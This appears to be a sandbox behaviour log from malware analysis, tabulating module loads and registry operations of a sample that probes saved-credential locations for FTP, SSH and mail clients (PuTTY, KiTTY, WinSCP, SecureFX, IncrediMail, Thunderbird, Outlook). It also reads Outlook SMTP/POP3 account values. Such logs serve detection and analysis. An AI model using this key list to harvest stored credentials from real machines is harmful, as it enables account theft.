| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\QtWeb.NET\QtWeb Internet Browser\AutoComplete |
|
1 | |
| Module | Load | module_name = SHELL32, base_address = 0x752c0000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| System | Sleep | duration = 10 milliseconds (0.010 seconds) |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = SHELL32, base_address = 0x752c0000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = SHELL32, base_address = 0x752c0000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = SHELL32, base_address = 0x752c0000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
2 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\VanDyke\SecureFX, value_name = Config Path |
|
1 | |
| Module | Load | module_name = SHELL32, base_address = 0x752c0000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = SHELL32, base_address = 0x752c0000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\NCH Software\Fling\Accounts |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\NCH Software\Fling\Accounts |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\9bis.com\KiTTY\Sessions |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird, value_name = CurrentVersion |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| System | Sleep | duration = 10 milliseconds (0.010 seconds) |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
2 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = SHELL32, base_address = 0x752c0000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\IncrediMail\Identities |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = SHELL32, base_address = 0x752c0000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = SHELL32, base_address = 0x752c0000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Martin Prikryl |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Martin Prikryl |
|
1 | |
| Module | Load | module_name = SHELL32, base_address = 0x752c0000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = SHELL32, base_address = 0x752c0000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
2 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Postbox\Postbox, value_name = CurrentVersion |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\FossaMail, value_name = CurrentVersion |
|
1 | |
| Module | Load | module_name = SHELL32, base_address = 0x752c0000 |
|
1 | |
| System | Sleep | duration = 10 milliseconds (0.010 seconds) |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\WinChips\UserAccounts |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\03fea8ae12202041b643a9691e5b323c |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\03fea8ae12202041b643a9691e5b323c, value_name = Email, type = REG_NONE |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\03fea8ae12202041b643a9691e5b323c |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\03fea8ae12202041b643a9691e5b323c |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab, value_name = Email, type = REG_NONE |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046, value_name = Email, type = REG_NONE |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a, value_name = Email, type = REG_NONE |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604, value_name = Email, type = REG_NONE |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831, value_name = Email, type = REG_NONE |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec, value_name = Email, type = REG_NONE |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046, value_name = Email, type = REG_NONE |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2, value_name = Email, type = REG_NONE |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, value_name = Email, type = REG_NONE |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = Email, type = REG_NONE |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = Email, type = REG_NONE |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = SMTP Email Address, type = REG_NONE |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = SMTP Server, type = REG_NONE |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = SMTP User Name, type = REG_NONE |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = SMTP User, type = REG_NONE |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 Server, type = REG_NONE |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 User Name, type = REG_NONE |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 User, type = REG_NONE |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = NNTP Email Address, type = REG_NONE |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = NNTP User Name, type = REG_NONE |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
